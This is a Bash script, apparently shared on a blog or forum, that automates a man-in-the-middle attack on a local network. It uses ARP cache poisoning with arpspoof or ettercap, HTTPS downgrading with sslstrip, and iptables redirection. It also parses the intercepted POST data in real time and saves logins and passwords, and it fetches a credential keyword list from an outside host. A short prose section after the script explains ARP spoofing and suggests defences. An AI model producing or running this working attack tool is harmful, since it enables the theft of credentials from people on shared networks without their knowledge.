echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else echo "Ok, not installing then !"
fi
else echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
_______ _______ _______ _______ _______ _____
|\ /|( ___ )( )( ___ )( ____ \ |\ /|( __ ) / ___ \
( \ / )| ( ) || () () || ( ) || ( \/ | ) ( || ( ) | ( ( ) )
\ (_) / | (___) || || || || (___) || (_____ | | | || | / | ( (___) |
\ / | ___ || |(_)| || ___ |(_____ ) ( ( ) )| (/ /) | \____ |
) ( | ( ) || | | || ( ) | ) | \ \_/ / | / | | ) |
| | | ) ( || ) ( || ) ( |/\____) | \ / | (__) | _ /\____) )
\_/ |/ \||/ \||/ \|\_______) \_/ (_______)(_)\______/ " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup() {
echo
echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"
kill ${sslstripid}
kill ${looparseid}
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
rm /tmp/grepcred.txt
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt /root/$filename.txt #moving file
if [ -f "/root/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else echo "Logs not saved"
fi
echo
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not downloading needed 'grepcred.txt' file because of silent mode. Make sure you already have a copy or the parsing *will* fail."
else
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
fi
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else echo "Error while saving passwords" #it does not
fi
else echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
echo
echo
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
if [[ $install = "Y" || $install="y" ]] ; then
cp ./yamas.sh /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m"
else echo "Script not installed."
fi
fi
exit 1
}
updatestrip() {
wget -q http://www.thoughtcrime.org/software...rip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install > /dev/null
cd ..
rm sslstrip-0.9.tar.gz
}
search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan () {
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target() {
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii() {
clear
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "ASCII tables won't be available"
echo "ASCII tables are not available" > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
cat /tmp/ascii
rm /tmp/ascii
fi
final
}
tailsecure() {
xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
final
}
rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse
elif [ "$rtp" = "3" ] ; then
echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse
elif [ "$rtp" = "4" ] ; then
echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse
elif [ "$rtp" = "5" ] ; then
echo "Previous"
final
else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
rtparse
fi
}
final() {
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Tail-grep hosts through output (make sure there is traffic).
5. Real-time parsing...
6. Quit properly.
Enter the number of the desired option."
read final
if [ "$final" = "1" ] ; then
rescan
elif [ "$final" = "2" ] ; then
add_target
elif [ "$final" = "3" ] ; then
ascii
elif [ "$final" = "4" ] ; then
tailsecure
elif [ "$final" = "5" ] ; then
rtparse
elif [ "$final" = "6" ] ; then
cleanup
else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final
fi
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ] ; then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ] ; then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ] ; then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
#### BEGIN of update process ####
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
else
if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
version ? [Y/N]
Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
should be safe to use though."
read -e sslupdate
if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
updatestrip
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
else echo "\033[33mOops, install failed.\033[m Continuing with current version."
fi
else echo "All right, continuing with current version."
fi
elif [[ $sslversion = "0.9" ]]; then
echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
fi
elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
read -e sslupdate
if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
updatestrip
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
else echo "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
fi
else echo "All right, continuing with current, non-installed version."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
fi
fi
elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
chmod +x '/pentest/web/sslstrip/sslstrip.py'
if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
echo "Now it is. Continuing..."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
installed.
You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
read apti
if [[ $apti = "Y" || $apti = "y" ]] ; then
apt-get install sslstrip
exit 1
fi
fi
fi
fi
sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 2) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 2) { print $5}')
gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ] ; then
gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ] ; then
iface=$(ip route show | awk '(NR == 2) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
echo
echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]] ; then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){" > /tmp/looparse.sh
if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
else
echo "wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt" >> /tmp/looparse.sh
fi
echo "while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" >> /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
Well, this script is a MITM attack. But how to protect yourself of this kind of crap?!!
How to protect yourself from Man in the Middle Attacks ? --
Introduction -- How it works.
In the attack Yamas uses, the vector is the poisonning of the victim's ARP cache. ARP is the protocol that will "translate" physical mac adresses into IP adresses on the local network. When an equipement wants to connect to the network, it will ask for the mac of the router's IP, eg : "Who has 192.168.1.1 ? Tell 192.168.1.2". The router then responds "198.168.1.1 [router] is at 11:22:33:44:55:66 [router]". This will be written in the ARP cache of the client. And this is where we come in play. We send spoofed ARP responses : "192.168.1.1 [router] is at 00:11:22:66:66:66 [attacker]". The client will then modify its cache to set the attacker as the router. We then forward the traffic to the real router, which allows us to read, and manilipulate the traffic on-the-fly. That's how we get the passwords. Thanks to sslstrip, we force the clients to send the credentials as clear text, so that we can simply read them.
All right, but now, how do you protect yourself from that to happen to you ?
Protection - Client side
When you are a client - a website visitor - there are two things you can do : use programs, and/or your head. Program wise you'll have to find one that regularly checks for changements in the ARP tables to warn you in case of suspicious changements. Well-known ones include ARPon or ARPwatch.
You could also use ettercap under *nux or wireshark on any platform : even though it is not their job, and they will not run all the time, they will warn you in case of duplicates ARP responses with different MAC adresses. That also can be achieved with some internet security suites, but I won't make free ad for them so you'll have to find with you friend Google.
In the end, it's most of all a question of habits, or using your head, knowing your environnement : thou shall never - ever enter any [important] credential on unsecured connections such as public hotspots and open wifi, under any circumstances. Thou shall always check if the connection to the website is safe : the certicficate looks good, is up to date and the connection is tunneled through SSL (v3 if possible).
Since you're here, you probably use this attack yourself, so you should be able to recognize the glitches it provokes : have to relaod the page ? Page looks weird ? Takes time to load ? Disonnected when you didn't ask for it ? Pay attention, you may be under attack !
If you have any doubt, just don't send anything sensible over the network. It may seem obvious, but that's how you'll really protect yourself.
Protection - Server side
I either don't know much about it, or there's not much than I know to do. Well here's what you can do : use an encrypted connection through SSL (but that sometimes costs, and I wouldn't pay for that...) or request the passwords to be encrypted before they are sent ! This can be done with .htaccess by using AuthType Digest. By requesting an MD5 encrypted password before it transits on the network, it could be sniffed, but rendered useless since MD5 isn't that easy to crack if you're using a good password. I know I wouldn't waste time cracking and MD5 password...
I'll try to add a module here to show you that. Meanwhile you can head over to maemo's website that uses this technique and sniff the network while doing so.
Edit : This is not the latest available version, go and grab it at http://comax.fr/
Commentaire